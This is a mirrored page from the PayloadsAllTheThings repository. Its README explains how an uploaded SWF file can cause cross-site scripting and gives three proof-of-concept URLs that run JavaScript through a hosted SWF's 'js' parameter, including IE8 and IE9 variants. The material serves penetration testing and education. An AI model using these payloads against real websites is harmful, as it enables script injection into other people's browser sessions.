PayloadsAllTheThings

mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-09 03:26:07 +02:00

History

Swissky 404afd1d71 Fix name's capitalization		2019-03-07 00:07:55 +01:00
..
README.md	Fix name's capitalization	2019-03-07 00:07:55 +01:00
xss.swf	Fix name's capitalization	2019-03-07 00:07:55 +01:00
xssproject.swf	Fix name's capitalization	2019-03-07 00:07:55 +01:00

README.md

XSS via SWF

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.

Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);

IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}

IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);

README.md Unescape Escape

XSS via SWF

README.md